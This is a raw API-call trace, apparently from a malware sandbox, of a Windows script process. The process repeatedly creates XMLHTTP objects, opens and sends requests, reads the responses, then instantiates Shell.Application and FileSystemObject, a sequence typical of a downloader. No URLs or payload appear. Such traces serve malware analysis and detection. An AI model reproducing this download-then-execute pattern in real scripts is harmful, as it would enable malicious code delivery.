	[0347.255] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74f0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7558) returned 0x0
	[0347.255] ??2@YAPEAX_K@Z () returned 0x62f330
	[0347.255] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7558, pUnkSite=0x62f330) 
	[0347.255] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0347.255] XMLHTTPRequest:IUnknown:Release (This=0x49c7558) returned 0x0
	[0347.255] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74f0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c74f0) returned 0x0
	[0347.256] XMLHTTPRequest:IUnknown:AddRef (This=0x49c74f0) returned 0x3
	[0347.256] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74f0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0347.256] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74f0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0347.256] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74f0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0347.256] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0347.256] SysStringLen (param_1=0x0) returned 0x0
	[0347.256] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0347.256] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0347.256] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5aa0) returned 0x0
	[0347.256] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0347.256] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7458) returned 0x0
	[0347.256] ??2@YAPEAX_K@Z () returned 0x62f310
	[0347.256] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7458, pUnkSite=0x62f310) 
	[0347.256] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0347.256] XMLHTTPRequest:IUnknown:Release (This=0x49c7458) returned 0x0
	[0347.256] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5aa0) returned 0x0
	[0347.256] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5aa0) returned 0x3
	[0347.256] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0347.257] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0347.257] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0347.257] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0347.257] SysStringLen (param_1=0x0) returned 0x0
	[0347.257] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0347.257] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0347.257] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c77b0) returned 0x0
	[0347.257] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0347.257] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c77b0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5b58) returned 0x0
	[0347.257] ??2@YAPEAX_K@Z () returned 0x62f330
	[0347.257] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5b58, pUnkSite=0x62f330) 
	[0347.257] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0347.257] XMLHTTPRequest:IUnknown:Release (This=0x49c5b58) returned 0x0
	[0347.257] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c77b0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c77b0) returned 0x0
	[0347.257] XMLHTTPRequest:IUnknown:AddRef (This=0x49c77b0) returned 0x3
	[0347.257] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c77b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0347.257] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c77b0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0347.258] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c77b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0347.258] longjmp () 
	[0347.258] longjmp () 
	[0347.258] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0347.258] SysStringLen (param_1=0x0) returned 0x0
	[0347.258] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0347.258] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0347.258] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5bf0) returned 0x0
	[0347.258] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0347.258] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bf0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5c58) returned 0x0
	[0347.258] ??2@YAPEAX_K@Z () returned 0x62f310
	[0347.258] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5c58, pUnkSite=0x62f310) 
	[0347.258] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0347.258] XMLHTTPRequest:IUnknown:Release (This=0x49c5c58) returned 0x0
	[0347.258] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bf0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5bf0) returned 0x0
	[0347.258] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5bf0) returned 0x3
	[0347.258] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bf0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0347.258] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5bf0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0347.259] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bf0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0347.259] longjmp () 
	[0347.259] longjmp () 
	[0347.259] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0347.259] SysStringLen (param_1=0x0) returned 0x0
	[0347.259] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0347.259] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0347.259] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5aa0) returned 0x0
	[0347.259] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0347.259] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5b58) returned 0x0
	[0347.259] ??2@YAPEAX_K@Z () returned 0x62f330
	[0347.259] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5b58, pUnkSite=0x62f330) 
	[0347.259] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0347.259] XMLHTTPRequest:IUnknown:Release (This=0x49c5b58) returned 0x0
	[0347.259] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5aa0) returned 0x0
	[0347.259] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5aa0) returned 0x3
	[0347.259] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0347.260] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0347.260] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0347.260] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0347.260] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Send", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=5) returned 0x0
	[0347.260] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0347.944] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd48 | out: ppvObject=0x28dd48*=0x0) returned 0x80004002
	[0347.944] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28de60*="responseText", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc9c | out: rgDispId=0x28dc9c*=10) returned 0x0
	[0347.945] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0347.945] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0347.945] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0347.945] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0347.945] CLSIDFromProgIDEx (in: lpszProgID="Shell.Application", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0))) returned 0x0
	[0347.945] SysStringLen (param_1=0x0) returned 0x0
	[0347.945] CoGetClassObject (in: rclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x7fefe928d20) returned 0x0
	[0347.945] Shell:IUnknown:QueryInterface (in: This=0x7fefe928d20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0347.945] Shell:IClassFactory:CreateInstance (in: This=0x7fefe928d20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x396820) returned 0x0
	[0347.946] Shell:IUnknown:Release (This=0x7fefe928d20) returned 0x1
	[0347.946] Shell:IUnknown:QueryInterface (in: This=0x396820, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x396860) returned 0x0
	[0347.946] ??2@YAPEAX_K@Z () returned 0x62f350
	[0347.946] Shell:IObjectWithSite:SetSite (This=0x396860, pUnkSite=0x62f350) returned 0x0
	[0347.946] XMLHTTPRequest:IUnknown:AddRef (This=0x62f350) returned 0x2
	[0347.946] Shell:IUnknown:Release (This=0x396860) returned 0x1
	[0347.946] Shell:IUnknown:QueryInterface (in: This=0x396820, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x396820) returned 0x0
	[0347.946] Shell:IUnknown:AddRef (This=0x396820) returned 0x3
	[0347.946] CLSIDFromProgIDEx (in: lpszProgID="Scripting.FileSystemObject", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28))) returned 0x0
	[0347.946] SysStringLen (param_1=0x0) returned 0x0
	[0347.946] CoGetClassObject (in: rclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x45f000) returned 0x0
